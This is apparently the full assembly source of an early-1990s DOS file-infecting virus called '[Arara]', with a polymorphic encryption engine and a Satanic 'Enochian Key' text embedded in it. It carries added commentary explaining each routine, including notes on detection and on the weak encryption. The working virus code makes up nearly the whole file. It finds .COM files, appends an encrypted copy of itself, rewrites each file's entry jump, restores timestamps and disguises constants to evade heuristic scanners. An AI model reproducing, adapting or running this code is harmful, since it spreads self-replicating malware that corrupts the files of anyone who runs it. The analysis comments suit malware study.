;
; [Arara] Virus
; Generated by [TVG]
; Minor modifications done to avoid heuristic detection by TbScan
; Cloaked with a minor polymorphic protection device
; Created on Monday November 11, 1993
; Written for compilation in A86 pd assembler
;
; This is not a major virus, but I want to see how they react in the Virus
; summary. Maybe they say it's from Bulgaria because of the language. Well,
; if you want me to write something (fairly neutral) about satanism for a mag
; then say it so. I try to keep it interesting...
;
; John Tardy
; Entry stub: a jump over a one-byte marker. The marker literal is damaged in
; this listing; the same literal is stored after JUMP and is compared against
; the fourth byte read from a candidate file in the search loop.
JMP MAIN
DB '<27> '
; Position-independent setup. CALL pushes the run-time address of GETOFS; it is
; read back through SS:[BP] and the assemble-time address of GETOFS is
; subtracted, so BP holds the load displacement that biases every later data
; reference of the form [...][BP].
MAIN: CALL GETOFS
GETOFS: MOV BP , SP
MOV BP , SS :[ BP ]
PUSH AX ; entry AX stays on the stack and is popped again at ERROR
SUB BP , GETOFS
MAINVIR EQU $
CALL RANDOMIZE ; advance the MT selectors and pick a new ENCRYPTVAL
; Copy the four bytes saved in ORGPRG back to offset 100h, which is where the
; final JMP BX at ERROR transfers control.
MOV AX ,[ ORGPRG ][ BP ]
LEA DI , 100H
STOSW
MOV AX ,[ ORGPRG ][ 2 ][ BP ]
STOSW
; INT 21h/AH=1Ah: set the disk transfer area to DS:0FD00h. Find-first/next
; results are written there, which is why the found file name is addressed as
; 0FD1Eh (record offset 1Eh) in the rest of the code. ERROR sets it back to 80h.
MOV AH , 1AH
MOV DX , 0FD00H
INT 21H
; Swap the two bytes at WEXL (FILESPEC+2) so the stored, transposed pattern
; becomes the one actually passed to find-first.
CALL CH ANGE
; Search-and-append loop. Walks the files matching FILESPEC (a pattern with no
; path component), skips any file whose first word is an EXE signature or whose
; fourth byte is already the marker, appends an encoded copy of MAIN..START to
; the first remaining file, overwrites that file's first four bytes with JUMP,
; and then leaves through READY. Attributes and the date/time stamp are saved
; on the stack first and put back by CLOSE.
; NOTE(analysis): the effects visible on a modified file are growth at the end,
; a first byte of 0E9h followed by a displacement close to the old file length,
; the marker at byte 3, and an unchanged timestamp and attribute set - so
; integrity checks have to compare content or size rather than dates.
MOV AH , 4EH ; INT 21h find-first; the loop re-enters with AH=4Fh (find-next)
SEARCH: LEA DX , FILESPEC [ BP ]
XOR CX , CX ; attribute mask 0
INT 21H
JNC NOERROR
JMP READY ; carry set: no (further) match
NOERROR: MOV AX , 4300H ; get attributes of the name in the find record
MOV DX , 0FD1EH
INT 21H
PUSH CX ; saved attributes, consumed by CLOSE
MOV AX , 4301H ; set attributes to 0 (presumably to clear read-only before the open)
XOR CX , CX
INT 21H
MOV AX , 3D02H ; open read/write
MOV DX , 0FD1EH
INT 21H
XCHG AX , BX ; handle -> BX
MOV AX , 5700H ; get file date/time
INT 21H
PUSH CX ; saved time, consumed by CLOSE
PUSH DX ; saved date, consumed by CLOSE
MOV AH , 3FH ; read the first 4 bytes of the file into ORGPRG
LEA DX , ORGPRG [ BP ]
MOV CX , 4
INT 21H
; The first word is inverted before it is compared, so the constants 0B2A5h and
; 0A5B2h stand for 4D5Ah and 5A4Dh: both byte orders of the EXE signature. The
; plain values never appear in the code.
MOV CX , W ORGPRG [ BP ]
XOR CX , 0FFFFH
CMP CX , 0B2A5H
JE EXEFILE
CMP CX , 0A5B2H
JE EXEFILE
CMP B ORGPRG [ BP ][ 3 ], '<27> ' ; marker already present at byte 3: skip
JE EXEFILE
MOV AX , 4202H ; seek to end of file; the length comes back in DX:AX
XOR CX , CX
CWD ; DX = 0, since AX = 4202h is non-negative
INT 21H
SUB AX , 3 ; length - 3 = displacement of a 3-byte near jump at offset 0
MOV JUMP [ 1 ][ BP ], AX
PUSH BX
PUSH AX
CALL CH ANGE ; swap the FILESPEC bytes back to their stored order
; Arguments for ENCRYPT: DS:SI = MAIN (source), CX = VIRLEN, ES:DI = START
; (output buffer), DX = (length - 3) + 103h = length + 100h, AX = 3.
MOV DS , CS
LEA SI , MAIN [ BP ]
MOV CX , VIRLEN
MOV ES , CS
LEA DI , START [ BP ]
POP DX
ADD DX , 103H
MOV AX , 3
CALL ENCRYPT
POP BX
MOV AH , 40H ; write CX bytes (the count returned by ENCRYPT) at end of file
MOV DS , CS
LEA DX , START [ BP ]
INT 21H
MOV AX , 4200H ; seek back to offset 0
XOR CX , CX
CWD
INT 21H
MOV AH , 40H ; overwrite the first 4 bytes with JUMP (0E9h, displacement, marker)
LEA DX , JUMP [ BP ]
MOV CX , 4
INT 21H
CALL CL OSE
JMP READY ; only one file is modified per run
EXEFILE: CALL CL OSE
MOV AH , 4FH ; find-next, then back to the top of the loop
JMP SEARCH
; Exit path: put the disk transfer area back at offset 80h, reload DS from CS,
; recover the AX that was pushed at entry and jump to offset 0100h, where the
; four saved bytes were written back at start-up. The target is stored as
; 0FEFFh and inverted at run time, the same masking used for the constants in
; the file check; the header comment attributes such changes to avoiding
; heuristic detection.
READY EQU $
ERROR: MOV AH , 1AH
MOV DX , 80H
INT 21H
MOV DS , CS
POP AX
MOV BX , 0FEFFH
XOR BX , 0FFFFH ; BX = 0100h
JMP BX
; CLOSE: restores file metadata and closes the handle in BX.
; Stack on entry (top first): return address, saved date, saved time, saved
; attributes - the values pushed in the search loop. The return address is
; lifted into SI so the three saved values can be popped, then pushed back for
; the RET.
; The set-date/time and set-attribute function numbers (5701h, 4301h) are
; produced by loading 5700h/4300h and incrementing, so the plain values do not
; appear as immediates.
; Leaves DS = ES = CS. Clobbers AX, CX, DX, SI.
CLOSE: POP SI
POP DX ; date
POP CX ; time
MOV AX , 5700H
INC AX ; 5701h: set file date/time to the saved stamp
INT 21H
MOV AH , 3EH ; close handle
INT 21H
POP CX ; attributes
MOV AX , 4300H
INC AX ; 4301h: set attributes on the name in the find record
MOV DX , 0FD1EH
INT 21H
MOV DS , CS
MOV ES , CS
PUSH SI
RET
; Name string. No code in this listing references it; it lies between MAIN and
; START, so it is part of the region that ENCRYPT encodes before writing.
DB '[ARARA]'
; CHANGE: swaps the two bytes of the word at WEXL (FILESPEC+2) in place.
; Calling it twice restores the original order. Clobbers AX.
CHANGE: MOV AX , W WEXL [ BP ]
XCHG AL , AH
MOV W WEXL [ BP ], AX
RET
;---------------------------------------------------------------------------
;
; Encryption engine
;
;---------------------------------------------------------------------------
; RANDOMIZE: prepares the per-run encoder state.
;   1. Adds 1 to every byte of MT (SI runs from MTLEN down to 1, indexing
;      MT[SI-1]).
;   2. Resets to 0 every MT byte that is not below its limit in MTMAX
;      (unsigned compare).
;   3. Polls the byte at 0000:046Ch (BIOS data area, low byte of the timer tick
;      count) until it is non-zero and stores it in ENCRYPTVAL.
; Leaves DS = CS. Clobbers AX, CX, SI.
; NOTE(analysis): the MT bytes are counters that step by one per run, not
; random values, and the key is a single non-zero byte, so the set of possible
; outputs is small and can be enumerated.
RANDOMIZE: MOV CX , MTLEN
INCREASE: MOV SI , CX
INC B MT [ SI ][ - 1 ][ BP ]
LOOP INCREASE
CHECKIT: MOV CX , MTMAXLEN
CHECKVAL: MOV SI , CX
MOV AH , MT [ SI ][ - 1 ][ BP ]
MOV AL , MTMAX [ SI ][ - 1 ][ BP ]
CMP AH , AL
JB GOODVAL
MOV B MT [ SI ][ - 1 ][ BP ], 0 ; selector reached its limit: wrap to 0
GOODVAL: LOOP CH ECKVAL
XOR AX , AX
MOV DS , AX ; DS = 0 to address the BIOS data area
NOTZERO: MOV AL , B DS :[ 046CH ]
OR AL , AL
JZ NOTZERO ; a zero key is rejected
MOV DS , CS
MOV ENCRYPTVAL [ BP ], AL
RET
; Scratch words used by ENCRYPT:
;   DUMMY1   - output position of the 16-bit placeholder that is patched last
;   DUMMY2   - output position recorded as the loop target
;   CALNEWCX - output buffer start (the DI passed in)
DUMMY1 DW 0 ; offset mov bx,si,di
DUMMY2 DW 0 ; offset loop
CALNEWCX DW 0
; ENCRYPT: writes a short variable stub followed by an encoded copy of the
; source bytes into the output buffer.
; In (as set up by the caller in the search loop):
;   DS:SI = source, CX = source length, ES:DI = output buffer,
;   DX    = value added when the placeholder at DUMMY1 is resolved,
;   AX    = value stored into AMOUNT (an immediate inside INSERTGARBAGE).
; Out:  CX = number of bytes written (final DI minus CALNEWCX).
;
; Stub layout, each item chosen through XLAT from a table indexed by the MT
; selector bytes, with zero or more filler bytes from INSERTGARBAGE between
; some items:
;   VAL2T opcode + 16-bit immediate derived from COUNTLOOP
;   VAL3SUB opcode + VAL3T operand byte
;   VAL1T opcode + 16-bit placeholder (position kept in DUMMY1)
;   [DUMMY2] VAL4T opcode + VAL5T operand byte + ENCRYPTVAL
;   VAL6T opcode
;   VAL7T opcode + 8-bit backward displacement to DUMMY2
; NOTE(analysis): ENCRYPTVAL is emitted in the clear inside the stub, and the
; body transform at CODEIT is a per-byte XOR, SUB or ADD with that one byte, so
; the body can be recovered from a sample by reading the key or by trying the
; 3 x 255 combinations; the fixed tables also bound the set of stub variants.
ENCRYPT: PUSH DS
PUSH SI
PUSH CX
MOV AMOUNT [ BP ], AX ; patch the mask immediate used by INSERTGARBAGE
MOV COUNTLOOP [ BP ], CX
MOV CALNEWCX [ BP ], DI
LEA SI , MT [ BP ] ; SI now walks the selector bytes
CALL INSERTGARBAGE
XOR AX , AX
LODSB
PUSH AX
LEA BX , VAL2T [ BP ]
CALL USETABLE
ADD AX , W [ COUNTLOOP ][ BP ]
STOSW
LODSB
PUSH AX
CALL INSERTGARBAGE
LEA BX , VAL3SUB [ BP ]
CALL USETABLE
POP AX
SHL AX , 2 ; VAL3T is laid out in rows of four
POP BX
ADD AX , BX
LEA BX , VAL3T [ BP ]
CALL USETABLE
CALL INSERTGARBAGE
LODSB
PUSH AX
PUSH AX
LEA BX , VAL1T [ BP ]
CALL USETABLE
MOV DUMMY1 [ BP ], DI ; remember where the placeholder word goes
STOSW
CALL INSERTGARBAGE
MOV DUMMY2 [ BP ], DI ; loop target
LODSB
LEA BX , VAL4T [ BP ]
CALL USETABLE
POP BX
LODSB
MOV FUNCTION [ BP ], AL ; selects the transform applied at CODEIT
SHL AX , 2 ; VAL5T is laid out in rows of four
ADD AX , BX
LEA BX , VAL5T [ BP ]
CALL USETABLE
MOV AL , B [ ENCRYPTVAL ][ BP ]
STOSB ; key byte, stored unencoded in the stub
CALL INSERTGARBAGE
POP AX
LEA BX , VAL6T [ BP ]
CALL USETABLE
LODSB
LEA BX , VAL7T [ BP ]
CALL USETABLE
; Displacement byte: NOT(DI - DUMMY2) = DUMMY2 - (DI + 1), i.e. relative to the
; byte after the displacement.
MOV AX , DI
MOV BX , DUMMY2 [ BP ]
SUB AX , BX
NOT AX
STOSB
; Resolve the placeholder: (stub length) + DX, written at DUMMY1.
PUSH DI
MOV AX , CALNEWCX [ BP ]
SUB DI , AX
ADD DI , DX
MOV AX , DI
MOV DI , DUMMY1 [ BP ]
STOSW
POP DI
POP CX
POP SI
POP DS
; Body pass: CX source bytes from DS:SI are transformed with ENCRYPTVAL and
; stored at ES:DI. FUNCTION 0 -> XOR, 1 -> SUB, anything else -> ADD.
CODEIT: LODSB
CMP B FUNCTION [ BP ], 0
JNE WHATELSE1
XOR AL , ENCRYPTVAL [ BP ]
JMP NOELSE
WHATELSE1: CMP B FUNCTION [ BP ], 1
JNE WHATELSE2
SUB AL , ENCRYPTVAL [ BP ]
JMP NOELSE
WHATELSE2: ADD AL , ENCRYPTVAL [ BP ]
NOELSE: STOSB
LOOP CODEIT
MOV CX , CALNEWCX [ BP ]
SUB DI , CX
MOV CX , DI ; return value: total bytes written
RET
; USETABLE: table lookup and emit.
; In:  BX = table base (DS-relative), AL = index, ES:DI = output position.
; Out: AL = table byte, stored at ES:DI; DI advanced by one.
USETABLE:
XLAT
STOSB
RET
; INSERTGARBAGE: emits a small number of filler bytes taken from RANDOMCODE at
; ES:DI.
; The count is a value mixed from the timer tick word at 0000:046Ch, DI, SI,
; BP, CX and a word read through CS:[DI][BP], masked by the immediate of the
; AND instruction below. AMOUNT labels the last two bytes of that instruction,
; and ENCRYPT overwrites them with its AX argument, so the mask in effect is the
; caller's value rather than the 02h shown here. Each filler byte is picked
; with an index masked to 0..7.
; Preserves DS, SI, AX, CX. Clobbers BX; DI advances by the number of bytes
; emitted.
; NOTE(analysis): filler comes only from the single-byte values listed in
; RANDOMCODE, so stripping those values between the fixed stub items
; normalises the stub for matching.
INSERTGARBAGE: PUSH DS
PUSH SI
PUSH AX
PUSH CX
PUSH DS
PUSH SI
XOR AX , AX
MOV DS , AX ; DS = 0 to read the timer tick word
MOV AX , WORD PTR DS :[ 046CH ]
ADD AX , DI
SUB AX , SI
ADD AX , BP
ADD AX , WORD PTR CS :[ DI ][ BP ]
ADD AL , AH
ADD AX , CX
AND AX , 02H
AMOUNT EQU $ - 2
MOV CX , AX ; CX = number of filler bytes
AND AX , 7H ; AX = first table index
POP SI
POP DS
CMP CX , 0
JE NOGARBAGE
INSERT: LEA BX , RANDOMCODE [ BP ]
CALL USETABLE
ADD AX , DI
ADD AX , SI
ADD AX , WORD PTR CS :[ DI ][ BP ]
AND AX , 7 ; next table index
LOOP INSERT
NOGARBAGE: POP CX
POP AX
POP SI
POP DS
RET
; Encoder state and lookup tables.
; MTMAX holds the exclusive upper limit for the selector byte at the same
; position in MT; RANDOMIZE steps each MT byte and wraps it to 0 at its limit.
MTMAX DB 4 ; MT 0
DB 10 ; MT 1
DB 3 ; MT 2
DB 2 ; MT 4
DB 3 ; MT 5
DB 2 ; MT 6
DB 6 ; MT 7
MTMAXLEN EQU $ - MTMAX
MT DB 0 ; MT 0
DB 0 ; MT 1
DB 0 ; MT 2
DB 0 ; MT 4
DB 0 ; MT 5
DB 0 ; MT 6
DB 0 ; MT 7
MTLEN EQU $ - MT
; Offset Encrypted part
ENCOFS DW 0
; Counterloop decryption
COUNTLOOP DW 0
; Encryption value (single byte, taken from the timer tick count by RANDOMIZE)
ENCRYPTVAL DB 0
; Function
FUNCTION DB 0 ; 0=xor, 1=add, 2=sub (xchange in encr)
; Opcode and operand-byte tables read by ENCRYPT through USETABLE.
; MT 0
VAL1T DB 0BBH , 0BEH , 0BFH ; Mov Bx,Si,Di
; MT 1
VAL2T DB 0B8H , 0BBH , 0BAH , 0BDH ; Mov Ax,Bx,Dx,Bp
; MT 2 V
VAL3SUB DB 089H , 087H , 087H , 031H , 001H , 009H
DB 08BH , 033H , 003H , 00BH ; NEW
; MT 1 H
VAL3T DB 0C1H , 0D9H , 0D1H , 0E9H ; Mov Ax,Bx,Dx,Bp -> Cx
DB 0C1H , 0CBH , 0CAH , 0CDH ; Xchg Ax,Bx,Dx,Bp -> Cx
DB 0C1H , 0D9H , 0D1H , 0E9H ; Xchg Ax,Bx,Dx,Bp <- Cx
DB 0C1H , 0D9H , 0D1H , 0E9H ; Xor Ax,Bx,Dx,Bp -> Cx
DB 0C1H , 0D9H , 0D1H , 0E9H ; Add Ax,Bx,Dx,Bp -> Cx
DB 0C1H , 0D9H , 0D1H , 0E9H ; Or Ax,Bx,Dx,Bp -> Cx
DB 0C8H , 0CBH , 0CAH , 0CDH ; NEW
DB 0C8H , 0CBH , 0CAH , 0CDH ;
DB 0C8H , 0CBH , 0CAH , 0CDH ;
DB 0C8H , 0CBH , 0CAH , 0CDH ;
; MT 4 H
VAL4T DB 080H , 082H ; 00 / 0000
; MT 5 V
; MT 0 H
VAL5T DB 037H , 034H , 035H , 037H ; Xor Bx,Si,Di,bx
DB 007H , 004H , 005H , 007H ; Add Bx,Si,Di,bx
DB 02FH , 02CH , 02DH , 02FH ; Sub Bx,Si,Di,bx
; MT 0 H
VAL6T DB 043H , 046H , 047H ; Inc Bx,Si,Di
; MT 6 H
VAL7T DB 0E0H , 0E2H ; Loop Equal Functions
; MT 7 H
; Filler bytes used by INSERTGARBAGE: CLD, CLC, NOP, STC, CMC, INT 3, STI,
; CS: prefix, CMC.
RANDOMCODE DB 0FCH , 0F8H , 090H , 0F9H , 0F5H ; Random code
DB 0CCH , 0FBH , 02EH , 0F5H
; Search pattern, stored with the bytes at offset 2 and 3 transposed; CHANGE
; swaps them before the search and back again before the body is encoded.
FILESPEC DB '*.OCM' , 0
WEXL EQU FILESPEC + 2
; Four-byte header written over the start of a modified file: near-jump opcode,
; displacement (filled in with file length - 3), marker byte.
JUMP DB 0E9H
DW 0
DB '<27> '
; Storage for the four bytes read from the start of a file; the values
; assembled here are INT 20h followed by 'AR'.
ORG PRG DB 0CDH , 020H , 'AR'
;
; The Eighteenth Enochian Key opens the gates of Hell and casts up Lucifer
; and his blessing.
;
; Enochian
; Embedded text. No code in this listing references or prints it. It lies
; between MAIN and START, so it is inside the region ENCRYPT encodes and is not
; present in plain form in the appended copy.
DB 13 , 10 , 'ILASA MICALAZODA OLAPIRETA IALPEREJI BELIORE: DAS ODO BUSADIRE OIAD OUOARESA'
DB 13 , 10 , 'CAOSAGO: CASAREMEJI LAIADA ERANU BERINUTASA CAFAFAME DAS IVEMEDA AQOSO ADOHO'
DB 13 , 10 , 'MOZ, OD MAOFASA. BOLAPE COMO BELIORETA PAMEBETA. ZODACARE OD ZODAMERANU! ODO'
DB 13 , 10 , 'CICALE QAA. ZODOREJE, LAPE ZODIREDO NOCO MADA, HOATHAHE SAITAN!'
; English
; O thou mighty light and burning flame of comfort!, that unveilest the glory
; of Satan to the center of the Earth; in whom the great secrets of truth
; have their abiding; that is called in thy kingdom: "strength through joy,"
; and is not to be measured. Be thou a window of comfort unto me. Move there-
; fore, and appear! Open the mysteries of your creation! Be friendly unto me,
; for I am the same!, the true worshipper of the highest and ineffable King
; of Hell!
; START marks the first byte after the body; the search loop passes it to
; ENCRYPT as the output buffer and to the write call as the data to append.
; VIRLEN is the length of the region MAIN..START that gets encoded.
START EQU $
VIRLEN EQU $ - MAIN